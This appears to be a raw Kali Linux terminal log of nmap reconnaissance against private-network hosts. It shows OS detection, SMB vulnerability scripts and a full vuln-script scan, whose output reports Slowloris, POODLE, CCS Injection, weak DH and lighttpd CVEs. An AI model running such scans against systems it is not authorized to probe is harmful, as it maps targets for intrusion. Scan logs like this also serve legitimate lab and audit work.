Building dependency tree... Done
Reading state information... Done
E: Unable to locate package unicornscan
┌──(root㉿kali)-[/home/kali]
└─# nmap -O 192.168.2.1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:17 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00035s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|8|Vista|2008
OS CPE: cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.95 seconds
┌──(root㉿kali)-[/home/kali]
└─# namp -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse
Command 'namp' not found, did you mean:
command 'nama' from deb nama
command 'wamp' from deb python3-autobahn
command 'nmap' from deb nmap
command 'pamp' from deb paml
command 'nam' from deb nam
Try: apt install <deb name>
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:23 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00025s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:24 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00043s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script==smb-vuln-ms10-061.nse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:24 UTC
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:833: '=smb-vuln-ms10-061.nse' did not match a category, filename, or directory
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nse_main.lua:833: in local 'get_chosen_scripts'
/usr/bin/../share/nmap/nse_main.lua:1344: in main chunk
[C]: in ?
QUITTING!
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:25 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00036s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -p445 192.168.2.1 --script=smb-vuln-ms10-061.nse
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 01:27 UTC
Nmap scan report for 192.168.2.1
Host is up (0.00030s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: F4:4D:30:51:6D:DC (Elitegroup Computer Systems)
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
┌──(root㉿kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.2.208 netmask 255.255.255.0 broadcast 192.168.2.255
inet6 fe80::3103:3e0a:d4e8:8ef8 prefixlen 64 scopeid 0x20<link>
ether f4:4d:30:51:d6:df txqueuelen 1000 (Ethernet)
RX packets 1952 bytes 342996 (334.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 22482 bytes 1329568 (1.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 128 bytes 6440 (6.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 128 bytes 6440 (6.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(root㉿kali)-[/home/kali]
└─#
┌──(root㉿kali)-[/home/kali]
└─# nmap -T4 -A -v 192.168.0.19 --script=vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 17:18 UTC
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:18
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 0.00% done
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 0.00% done
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 0.00% done
Completed NSE at 17:18, 10.00s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Initiating ARP Ping Scan at 17:18
Scanning 192.168.0.19 [1 port]
Completed ARP Ping Scan at 17:18, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:18
Completed Parallel DNS resolution of 1 host. at 17:18, 0.00s elapsed
Initiating SYN Stealth Scan at 17:18
Scanning 192.168.0.19 [1000 ports]
Discovered open port 135/tcp on 192.168.0.19
Discovered open port 445/tcp on 192.168.0.19
Discovered open port 49158/tcp on 192.168.0.19
Discovered open port 49152/tcp on 192.168.0.19
Discovered open port 49153/tcp on 192.168.0.19
Discovered open port 49155/tcp on 192.168.0.19
Discovered open port 49154/tcp on 192.168.0.19
Discovered open port 139/tcp on 192.168.0.19
Completed SYN Stealth Scan at 17:18, 1.14s elapsed (1000 total ports)
Initiating Service scan at 17:18
Scanning 8 services on 192.168.0.19
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 37.50% done; ETC: 17:20 (0:01:00 remaining)
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 37.50% done; ETC: 17:20 (0:01:05 remaining)
Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 37.50% done; ETC: 17:20 (0:01:13 remaining)
Completed Service scan at 17:19, 58.56s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.19
NSE: Script scanning 192.168.0.19.
Initiating NSE at 17:19
Completed NSE at 17:19, 8.05s elapsed
Initiating NSE at 17:19
Completed NSE at 17:19, 0.03s elapsed
Nmap scan report for 192.168.0.19
Host is up (0.00024s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
MAC Address: F4:4D:30:51:16:F7 (Elitegroup Computer Systems)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Uptime guess: 0.087 days (since Fri Apr 21 15:14:06 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: B018; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
TRACEROUTE
HOP RTT ADDRESS
1 0.24 ms 192.168.0.19
NSE: Script Post-scanning.
Initiating NSE at 17:19
Completed NSE at 17:19, 0.00s elapsed
Initiating NSE at 17:19
Completed NSE at 17:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.57 seconds
Raw packets sent: 1083 (48.350KB) | Rcvd: 1017 (41.390KB)
┌──(root㉿kali)-[/home/kali]
└─# nmap -T4 -A -v 192.168.0.19 --script=vulnsamba-vuln-cve-2012-1182
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 17:23 UTC
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:833: 'vulnsamba-vuln-cve-2012-1182' did not match a category, filename, or directory
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nse_main.lua:833: in local 'get_chosen_scripts'
/usr/bin/../share/nmap/nse_main.lua:1344: in main chunk
[C]: in ?
QUITTING!
┌──(root㉿kali)-[/home/kali]
└─# vim new
┌──(root㉿kali)-[/home/kali]
└─# nmap -T4 -A -v 192.168.0.1 --script=vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 17:27 UTC
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:27
Completed NSE at 17:27, 10.00s elapsed
Initiating NSE at 17:27
Completed NSE at 17:27, 0.00s elapsed
Initiating ARP Ping Scan at 17:27
Scanning 192.168.0.1 [1 port]
Completed ARP Ping Scan at 17:27, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:27
Completed Parallel DNS resolution of 1 host. at 17:27, 0.00s elapsed
Initiating SYN Stealth Scan at 17:27
Scanning 192.168.0.1 [1000 ports]
Discovered open port 443/tcp on 192.168.0.1
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 53/tcp on 192.168.0.1
Completed SYN Stealth Scan at 17:27, 4.75s elapsed (1000 total ports)
Initiating Service scan at 17:27
Scanning 3 services on 192.168.0.1
Completed Service scan at 17:30, 142.15s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.1
NSE: Script scanning 192.168.0.1.
Initiating NSE at 17:30
Completed NSE at 17:31, 75.29s elapsed
Initiating NSE at 17:31
Completed NSE at 17:31, 3.61s elapsed
Nmap scan report for 192.168.0.1
Host is up (0.00089s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.35:
| CVE-2019-11072 7.5 https://vulners.com/cve/CVE-2019-11072
| CVE-2014-2323 7.5 https://vulners.com/cve/CVE-2014-2323
| CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
| CVE-2015-3200 5.0 https://vulners.com/cve/CVE-2015-3200
| CVE-2014-2324 5.0 https://vulners.com/cve/CVE-2014-2324
|_ OSV:CVE-2022-41556 0.0 https://vulners.com/osv/OSV:CVE-2022-41556
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
443/tcp open ssl/http lighttpd 1.4.35
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
| Modulus Type: Non-safe prime
| Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-server-header: lighttpd/1.4.35
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ http://www.cvedetails.com/cve/2014-0224
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.35:
| CVE-2019-11072 7.5 https://vulners.com/cve/CVE-2019-11072
| CVE-2014-2323 7.5 https://vulners.com/cve/CVE-2014-2323
| CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
| CVE-2015-3200 5.0 https://vulners.com/cve/CVE-2015-3200
| CVE-2014-2324 5.0 https://vulners.com/cve/CVE-2014-2324
|_ OSV:CVE-2022-41556 0.0 https://vulners.com/osv/OSV:CVE-2022-41556
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: C0:B8:E6:B6:07:74 (Ruijie Networks)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 3.0
Uptime guess: 0.140 days (since Fri Apr 21 14:09:46 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.89 ms 192.168.0.1
NSE: Script Post-scanning.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 237.89 seconds
Raw packets sent: 2031 (90.302KB) | Rcvd: 17 (1.378KB)